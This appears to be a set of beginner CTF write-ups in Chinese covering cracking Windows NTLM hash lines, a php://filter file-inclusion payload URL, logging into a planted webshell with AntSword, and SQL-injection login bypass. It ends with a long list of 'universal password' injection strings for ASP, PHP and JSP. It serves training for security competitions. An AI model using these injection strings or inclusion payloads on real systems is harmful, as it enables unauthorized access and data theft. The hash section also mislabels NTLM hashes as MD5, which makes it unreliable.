Windows系统密码 首先拿到题目,我们打开看一下,它后缀是.hash,双击之后我们发现打不开,这种情况有两种原因,一是我们没有安装相应的软件,二是该文件被毁坏了,然后我们尝试用记事本打开看一下,结果发现原来重点在这: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ctf:1002:06af9108f2e1fecf144e2e8adef09efd:a7fcb22a88038f35a8f39d503e7f0062::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:bef14eee40dffbc345eeb3f58e290d56::: 我们观察一下,发现ctf后面有两个序列都是满足MD5加密格式 然后我们就一个一个试,终于发现第二个可以解密正确的格式,然后它就是我们的答案了
[BJDCTF 2nd]小姐姐-y1ng 首先我们打开题目给的图片 (看到这么漂亮的小姐姐,你有没有心动呢),嘻嘻,我们还是专心做题吧,照着正常流程走,我们把它放到winhex中,看一下头和尾,没有什么发现,然后我们再搜索一下文本flag,还是无果,我们再来看一下题目,BJDCTF,嗯…我们试着输一下BJD没想到结果出来了
[ACTF2020 新生赛]Include1 首先我们打开题目链接http://56f3dad7-edff-4011-bb6c-ee4c8b0dab81.node3.buuoj.cn,跟着提示我们一步一步打开然后看到一句话 你能够发现flag吗,点开源码,没有发现什么,然后看到网址找到它是.php类型的,知道了它是考察利用php://filter伪协议进行文件包含构造payload = http://5165ec02-c72d-4737-85c5-295e639ea759.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php,把它输入网址上然后我们就可以看到 然后我们base64解密得到答案 [极客大挑战 2019]Knife1 打开题目链接,http://db65a8cb-49ec-4028-8dc6-2ef21a55557b.node3.buuoj.cn,一张图片迎面而来题目:白给的shell,让我想起了上一周做的webshell,然后我们打开蚁剑输入相应的网址和密码,密码就是图片中所提示的syc 然后点击添加,这样就添加好了 然后我们双击进去,打开它的根目录找到这个flag,然后打开就好了 [极客大挑战 2019]EasySQL1 首先我们打开网址http://671f217e-489f-48b8-9a45-d30881488c54.node3.buuoj.cn/看到用户登录界面 题目是easysql,所以判断它应该是SQL注入,然后我们利用万能密码注入,可是万能密码也有不同类型的,所以我们打开源码 发现它是php写的,所以我们就用php的万能密码尝试, admim’or’1’=1 连接起来username=admin’ or ‘1’=‘1&password=admin’ or ‘1’=‘1 万能密码(摘自百度): asp aspx万能密码 1:"or “a”="a 2:’.).or.(’.a.’=’.a 3:or 1=1– 4:‘or 1=1– 5:a’or’ 1=1– 6:"or 1=1– 7:‘or.‘a.’=‘a 8:“or”="a’=‘a 9:‘or’’=’ 10:‘or’=‘or‘ admin’or 1=1# PHP万能密码 admin’/* 密码*/’ ‘or 1=1/* "or “a”="a “or 1=1– “or”=” “or”="a’=‘a “or1=1– “or=or” '‘or’=‘or’ ‘) or (‘a’=‘a ‘.).or.(’.a.’=’.a 'or 1=1 'or 1=1– 'or 1=1/* 'or”="a’=‘a ‘or’ ‘1’=‘1’ ‘or’’=’ ‘or’’=’‘or’’=’ ‘or’=‘1’ ‘or’=‘or’ 'or.‘a.’=‘a ‘or1=1– 1’or’1’=‘1 a’or’ 1=1– a’or’1=1– or ‘a’=‘a’ or 1=1– or1=1– jsp 万能密码 1’or’1’=‘1 admin’ or 1=1/*